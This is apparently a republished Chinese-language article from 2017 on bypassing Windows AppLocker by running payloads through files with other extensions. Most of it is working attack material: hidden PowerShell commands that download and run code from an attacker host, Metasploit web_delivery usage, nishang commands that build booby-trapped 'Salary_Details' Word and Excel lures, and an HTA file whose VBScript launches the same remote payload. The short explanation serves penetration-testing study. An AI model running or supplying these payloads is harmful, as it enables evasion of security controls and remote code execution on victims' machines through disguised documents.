本文讲的是
看我如何利用文件扩展名绕过AppLocker?,
绕过AppLocker的限制通常需要使用Microsoft信任的二进制文件来执行代码或弱路径规则。然而,在系统中,系统已经配置了默认规则,并且允许使用命令提示符和PowerShell来通过使用具有不同文件扩展名的有效载荷来绕过AppLocker。
exploit/multi/script/web_delivery
cmd.exe /K < payload.txt
@echo off powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.100.3:8080/9Q21wiSds9E0pxi'); PAUSE
IEX (new-object net.webclient).downloadstring(' http://192.168.100.3:8080/9Q21wiSds9E0pxi ');
DOC XLS HTA LNK
PS C:nishangClient> Import-Module .Out-Word.ps1 PS C:nishangClient> Import-Module .Out-Excel.ps1 PS C:nishangClient> Out-Word -Payload "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring( 'http://192.168.100.3:8080/9Q21wiSds9E0pxi');" Saved to file C:nishangClientSalary_Details.doc 0 PS C:nishangClient> Out-Excel -Payload "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring ('http://192.168.100.3:8080/9Q21wiSds9E0pxi');" Saved to file C:nishangClientSalary_Details.xls 0 PS C:nishangClient>
<HTML> <HEAD> <script language="VBScript"> Set objShell = CreateObject("Wscript.Shell") objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.3:8080/9Q21wiSds9E0pxi')" </script> </HEAD> <BODY> </BODY> </HTML>
原文发布时间为:2017年6月14日
本文作者:李白
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。